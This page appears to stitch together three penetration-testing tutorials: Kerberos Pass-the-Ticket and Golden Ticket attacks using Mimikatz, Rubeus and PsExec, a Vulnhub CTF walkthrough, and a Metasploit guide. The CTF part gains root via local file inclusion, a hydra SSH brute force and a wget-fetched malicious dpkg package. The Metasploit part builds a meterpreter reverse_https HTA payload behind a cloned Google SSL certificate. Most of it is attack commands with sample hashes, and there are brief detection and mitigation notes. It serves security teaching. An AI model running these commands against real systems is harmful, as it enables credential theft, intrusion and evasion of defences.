Lateral Movement: Pass the Ticket Attack

After working on Pass the Hash attack and Over the pass attack, it’s time to focus on a similar kind of attack called Pass the Ticket attack. It is very effective and it punishes too if ignored. Let’s look into it.

Table of Content

·         Introduction

·         Configurations used in Practical

·         Working

·         Pass-the- Hash v/s Pass-the-Ticket

·         Pass-the-Ticket Attacks

o   Extracting Tickets: Mimikatz

o   Passing the Ticket: Mimikatz

o   Extracting Tickets: Rubeus

o   Passing the Ticket: Rubeus

·         Practical Approach: Golden Ticket Attack

·         Detection

·         Mitigation

Introduction

In the series articles for Lateral Movement which include techniques below are not the only way to further compromise the target Windows Server. There are other methods as well.

One such way, was discovered while I was trying to perform the Lateral Movement on the Windows Server from Kali Linux. The surprise was that I didn’t heard about this attack and even the Mimikatz supports it. So, I looked around to find that there is not much written about it. This attack is called Pass the Ticket attack and it can help the attacker to steal the Kerberos Credentials from the Linux system such as Kali Linux and then pass them on Windows Machine while authentication.

Configurations used in Practical

Attacker Machine

·         OS: Kali Linux 2020.2

·         IP Address: 192.168.1.112

Target Machine

·         Server

o   OS: Windows Server 2016

o   IP Address: 192.168.1.105

o   Domain: ignite.local

o   User: Administrator

·         Client

o   OS: Windows 10

o   IP Address: 192.168.1.106

o   User: Yashika

Working

In this attack the attacker extracts the Kerberos Ticket Grating Ticket which is also known as TGT. It is located inside the LSASS process in the memory of the system. After extracting the ticket the attacker uses the ticket on another system to gain the access.

Pass-the-Hash v/s Pass-the-Ticket

The major difference between the Pass-the-Ticket and Pass-the-Hash attack is that the time for which the access can be acquired. In simple words the Kerberos TGT tickets issues have an expiration time of 10 hours (This can be changed). In the case of the Pass-The-Hash there is no expiration. The attack will work until the user doesn’t change their password.  

Extracting Tickets: Mimikatz

As discussed before the tickets are loaded inside the memory and to extract them we will be using the mimikatz. We run the keberos::list command in mimikatz to read the tickets that are located in the LSASS. To save them on the machine we will use the /export parameter.

kerberos::list

kerberos::list /export

As we can see that we have the tickets that were saved inside the directory where we had the mimikatz executable. In the previous image we can see that the we have 2 tickets and the names of those tickets can be confirmed. For the sense of simplicity we renamed one of the tickets as ticket.kirbi.

               

Passing the Ticket: Mimikatz

Now Mimikatz don’t just give up after extracting the tickets. It can pass the tickets as well. This is the reason I prefer mimikatz. We go back to the mimikatz terminal. Here, we pass the ticket with the help of ptt module inside the Kerberos module followed by name of the ticket that we want to pass. This is the reason we renamed the ticket. Now that we have successfully passed the ticket. Now to perform the actions as the user that we passed the ticket for we decided to get a cmd as that user. This can be accomplished using the misc::cmd command as shown in the image given below.

kerberos::ptt ticket.kirbi

misc::cmd

Extracting Tickets: Rubeus

First we will use extract the tickets using Rubeus. This can be done with the help of the asktgt module. Although it is not so sneaky method but it gets the work done. We need the domain name, User, Password Hash. When used normally will give the base64 encoded TGT ticket. But Let’s Pass the Ticket as well in the same step. For this I will just give the /ptt parameter at the end as shown in the image given below. Rubeus will ask the user for a TGT ticket and after receiving the ticket it encodes the ticket in Base64 and save the ticket. Since I used the /ptt parameter as well, it will pass the ticket in the current session as well. When the ticket is passed, we can perform the actions as the user we passed the ticket for. Here we take a look at the directories of the said user.

Rubeus.exe asktgt /domain:ignite.local /user:Administrator /rc4: 32196b56ffe6f45e294117b91a83bf38 /ptt

dir \\WIN-S0V7KMTVLD2\c$

Passing the Ticket: Rubeus

If we don’t pass the ticket in the current session then we can use the ptt parameter separately and pass the ticket as the parameter as shown in the image given below. After successfully passing the ticket, we can use the ticket. For this we decided to get a cmd session of the user we passed the ticket for. We will be using the PsExec64.exe as shown in the image given below.

Rubeus.exe ptt /ticket:ticket.kirbi

PsExec.exe \\192.168.1.105 cmd.exe

ipconfig

Practical Approach: Golden Ticket Attack

Golden Ticket Attack is also a good example of the Pass the Ticket Attack. Let’s take a look at it. Mimikatz allows the attacker to create a forged ticket and simultaneously pass the TGT to KDC service to Get TSG and enable the attacker to connect to Domain Server. This can be done by running both command on cmd as administrator.

privilege::debug

kerberos::golden /user:pavan /domain:ignite.local /sid:S-1-5-21-3523557010-2506964455-2614950430 /krbtgt:f3bc61e97fb14d18c42bcbf6c3a9055f /id:500 /ptt

msic::cmd

Above command will generate the ticket for impersonate user with RID 500.

As soon as I ran the above mentioned commands the attacker gets a new cmd prompt which allows the attacker to connect with Domain Server using PsExec.exe as shown in the below image.

PsExec64.exe \\192.168.1.105 cmd.exe

ipconfig

Detection

·         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.

·         Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.

Mitigation

·         For containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it.

·         Ensure that local administrator accounts have complex, unique passwords.        

·         Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.

·         Do not allow a user to be a local administrator for multiple systems.

Credential Dumping: DCSync Attack

DevRandom CTF:1.1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “DevRandom CTF:1.1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to Hunri Beats. Let’s start and learn how to successfully breach it.

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link .

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Browsing HTTP Service

§  Local file inclusion

Exploiting

§  Password Bruteforce via hydra

§  Login to ssh

Privilege Escalation

§   Abusing sudo  dpkg

 

Walkthrough

Reconnaissance

We will start by scanning the network using Netdiscover tool and identify the host IP address.

We can identify our host IP address as 192.168.1.105. So let’s start with nmap port enumeration and execute following command in our terminal.

 nmap -A -p- 192.168.1.105

From its result, we found ports 22(SSH), 80(HTTP) were open. Also robots.txt is available .

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.

Nothing was displayed on the page . So we started exploring things we found in nmap scan that is:

192.168.1.105/robots.txt

192.168.1.105/?include=info

On seeing the above page i hit-and-trial lfi on it and boom it worked . From its result we found a user trevor .

192.168.1.105/?include=../../../../../../../../../etc/passwd

Exploiting

We have got a username trevor, now our next job is to find the password for the user trevor with the help of hydra, thus we execute following command:

hydra -l  trevor -P /usr/share/wordlists/rockyou.txt 192.168.1.105 ssh

From its result , we found the password that is qwertyuiop[]  .

Since We have username and a password, so we tried to access the SSH on the target system and were successfully able to logged in.

ssh trevor@192.168.1.105

let’s go for post exploitation and try to escalate root privileged. 

sudo -l

with the help of sudo list, we notice that trevor can execute dpkg program as root.

Privilege Escalation

As we know that dpkg is a package installer thus we need to create a malicious package and install the malicious package within the host machine with the help of dpkg as result it will escalate the root privilege.

TF=$(mktemp -d)

echo 'exec /bin/sh' > $TF/x.sh

fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

ls

python -m SimpleHTTPServer

Thus we run the following command found from gitfobin, that creates a malicious package to execute /bin/bash.

Once you will create the package, use python server to transfer this packet into host.

So, I downloaded the above malicious package inside /tmp using wget command.

cd /tmp

wget http://192.168.1.112:8000/x_1.0_all.deb

Now, once I have this package inside the /tmp I can used dpkg with sudo right to install the downloaded package, as soon as it will get install we will the root privilege shell.

sudo dpkg -i  x_1.0_all.deb

id

cd /root

ls

cat flag.txt

Bypass Detection for Meterpreter Shell (Impersonate_SSL)

In this article, we will learn to mimic an authentic SSL certificate to bypass various security measures taken by the target. It will also ensure the stealthiness of an attack. Today, everyone is more and more aware of cybersecurity and they take necessary measures to protect themselves. Now, this changes the approach of executing penetration test. Hence, the mantra for red teamers “Think like the Adversary”. 

That is why we will create the SSL certificate and allow the target to inspect the certificate in the primary stage of the connection itself. This way the target will not be suspicious and our work will be done. To do this, there is a module developed by Chris John Riley. You can find this module in Metasploit Framework.

This module studies the SSL certificate of an authenticated source that is provided in the options of the module and then it creates a local copy using all the information for the certificate that is provided to it. The local certificate is created in PEM format. It can be used in all the modules of Metasploit where SSLCert option is given.

So now, first we will generate the certificate using the module by typing the following commands:

use auxiliary/gather/impersonate_ssl

set rhosts www.google.com

exploit

As you can see, in the image above our certificate is created. Moving further, we will create a malicious .hta file which we will link to the certificate and then send it to the target. To link the certificate, we need to tell the module to attach the certificate by setting the StagerVerifySSLCert value to true and then giving then certificate path while setting handlersslcert. After setting the necessary information about the certificate, we will give the format of the output file to the module. In our case, we chose the .hta format. For this, simply type:

use windows/meterpreter/reverse_https

set lhost

set lport 443

set StagerVerifySSLCert true

set handlersslcert

generate -f hta-psh -o /root/patch.hta

And the malicious patch.hta file has been created. Now after the file has been sent and executed, we will have a session on our listener. To initiate the listener, type:

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost

set lport 443

set StagerVerifySSLCert true

set handlersslcert

And yes!! We have our session.